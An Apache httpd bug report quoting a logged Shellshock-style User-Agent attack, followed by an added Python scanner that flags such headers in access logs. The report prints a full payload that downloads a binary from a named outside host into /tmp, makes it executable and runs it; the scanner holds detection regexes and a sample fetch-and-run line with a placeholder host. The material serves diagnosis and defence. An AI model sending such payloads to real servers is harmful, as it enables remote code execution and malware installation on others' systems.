https://issues.apache.org/bugzilla/show_bug.cgi?id=57580
Bug ID: 57580
Summary: Perl code in "User-Agent" field is being executed and causing an exploit
Product: Apache httpd-2
Version: 2.4.10
Hardware: PC
OS: Linux
Status: NEW
Severity: critical
Priority: P2
Component: Core
Assignee: [email protected]
Reporter: [email protected]
User-Agent: "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://play.marketplay.eu/apache22 -O /tmp/apache24;curl -O /tmp/apache24 http://play.marketplay.eu/apache22;chmod 777 /tmp/apache24;/tmp/apache24;\");'"
(Outermost quotes added by my log file)
This bug is creating a /tmp/apache24 file, which appears to be a binary where
execution is subsequently attempted. (Whether "suexec" permits or denies the
binary is immaterial to the exploit.)
The problem is the creation of the file from executing the perl code in the
User-Agent string. The file should never be created, because the user-agent
string should never be executed by the system command processor. The perl
system() call should not happen, but it is happening - as the target file in
/tmp is being created. I cannot say if it's the "wget" or "curl" command which
creates the file, nor does that matter.
/tmp:
total 61
drwxrwxrwt 2 root none 60 Feb 12 18:39 .
drwxr-xr-x 22 root none 1024 Dec 10 22:36 ..
-rwxrwxrwx 1 webserv html 61112 Feb 12 03:25 apache24
System: Linux 3.18.6
Server version: Apache/2.4.12 (Unix)
Server built: Feb 9 2015 02:47:36
Server's Module Magic Number: 20120211:41
Server loaded: APR 1.4.2, APR-UTIL 1.3.10
Compiled using: APR 1.4.2, APR-UTIL 1.3.10
Architecture: 64-bit
Server MPM: worker
threaded: yes (fixed thread count)
forked: yes (variable process count)
Server compiled with....
-D APR_HAS_SENDFILE
-D APR_HAS_MMAP
-D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
-D APR_USE_SYSVSEM_SERIALIZE
-D APR_USE_PTHREAD_SERIALIZE
-D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
-D APR_HAS_OTHER_CHILD
-D AP_HAVE_RELIABLE_PIPED_LOGS
-D DYNAMIC_MODULE_LIMIT=256
-D HTTPD_ROOT="/usr"
-D SUEXEC_BIN="/usr/bin/suexec"
-D DEFAULT_PIDLOG="/var/logs/httpd.pid"
-D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
-D DEFAULT_ERRORLOG="logs/error_log"
-D AP_TYPES_CONFIG_FILE="/var/lib/httpd/conf/mime.types"
-D SERVER_CONFIG_FILE="/var/lib/httpd/conf/httpd.conf"
Shutting down the service at http://play.marketplay.eu will not fix the
exploit, as all the author has to do is move to another server.
Attempts to kill the exploit using BrowserMatch statements do not block it.
BrowserMatchNoCase "(system\(|wget\ -O)" no-log virus
BrowserMatchNoCase /bin/(p(erl|ph)|b?a?sh) no-log virus
The "virus" variable is set to 1, but the file still gets created. The HTTP
response code is 400, no-keep-alive.
Exploit: Why is the User-Agent string being executed in the first place?
This bug may be similar to 50561, but I have identified the point of attack.
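Added example (editor's code, not part of the bug report or of httpd): a scanner that reads httpd Combined Log Format lines and flags any request whose User-Agent, Referer or request line carries the `() { :;};` function-definition prefix seen above, plus the fetch-and-run chain (wget/curl followed by chmod or a /tmp path). The BrowserMatch rules in the report match specific interpreters and commands; matching the prefix itself is independent of which binary or download host the payload names. The sample log lines are constructed for this example, the host `example.invalid` is a placeholder, and the log layout is assumed to be the standard Combined Log Format with httpd's `\"` escaping of embedded quotes.

```python
"""Scan httpd Combined Log Format lines for the "() { :;};" header prefix."""
import re
from typing import Dict, List, Optional

# Combined Log Format. httpd writes embedded quotes inside quoted fields as \",
# so each quoted field accepts either a non-quote/non-backslash char or an
# escaped pair.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Bash function-definition prefix: "()" then a braced body, then ";".
FUNC_PREFIX_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
# Download-then-run chain as in the report: a downloader followed by chmod or /tmp.
FETCH_RUN_RE = re.compile(r'\b(?:wget|curl)\b.*?(?:chmod|/tmp/)', re.IGNORECASE)

# Constructed sample lines (not from the report). Line 4 mirrors the reported
# payload shape with a placeholder host; line 5 is a deliberate near-miss.
SAMPLE_LINES = [
    r'203.0.113.5 - - [12/Feb/2015:03:25:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/35.0"',
    r'203.0.113.9 - - [12/Feb/2015:03:25:17 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 400 0 "-" "() { :;}; /bin/echo \"hello\""',
    r'203.0.113.9 - - [12/Feb/2015:03:25:18 +0000] "GET / HTTP/1.0" 400 0 "() { :; }; echo from-referer" "curl/7.38.0"',
    r'203.0.113.9 - - [12/Feb/2015:03:25:19 +0000] "GET / HTTP/1.0" 400 0 "-" "() { :;}; wget http://example.invalid/x -O /tmp/x; chmod 755 /tmp/x"',
    r'198.51.100.2 - - [12/Feb/2015:03:26:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "() is not a function prefix"',
    r'this line is not in combined log format',
]
SAMPLE_LOG = "\n".join(SAMPLE_LINES)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one Combined Log Format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(value: str) -> List[str]:
    """Return the indicator tags found in one header value (empty list if clean)."""
    tags = []
    if FUNC_PREFIX_RE.search(value):
        tags.append("function-prefix")
    if FETCH_RUN_RE.search(value):
        tags.append("fetch-and-run")
    return tags


def scan_log(text: str) -> List[Dict[str, object]]:
    """Scan every line; report flagged header fields and lines that fail to parse."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            # A line that breaks the log format is itself worth a look.
            findings.append({"line": lineno, "ip": "-", "status": "-", "field": "line",
                             "tags": ["unparsed"], "value": line[:120]})
            continue
        for field in ("request", "referer", "agent"):
            tags = classify(rec[field])
            if tags:
                findings.append({"line": lineno, "ip": rec["ip"], "status": rec["status"],
                                 "field": field, "tags": tags, "value": rec[field]})
    return findings


def offending_ips(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count flagged requests per source address (unparsed lines excluded)."""
    counts: Dict[str, int] = {}
    for f in findings:
        if f["ip"] != "-":
            counts[str(f["ip"])] = counts.get(str(f["ip"]), 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} ip={f['ip']} status={f['status']} "
              f"{f['field']} [{','.join(f['tags'])}]: {f['value']}")
    print(offending_ips(scan_log(SAMPLE_LOG)))
```

Run it against a real access_log by replacing `SAMPLE_LOG` with the file contents; a 400 with a flagged agent corresponds to the "400, no-keep-alive" entries the report mentions, and the per-IP counts give the addresses to review first.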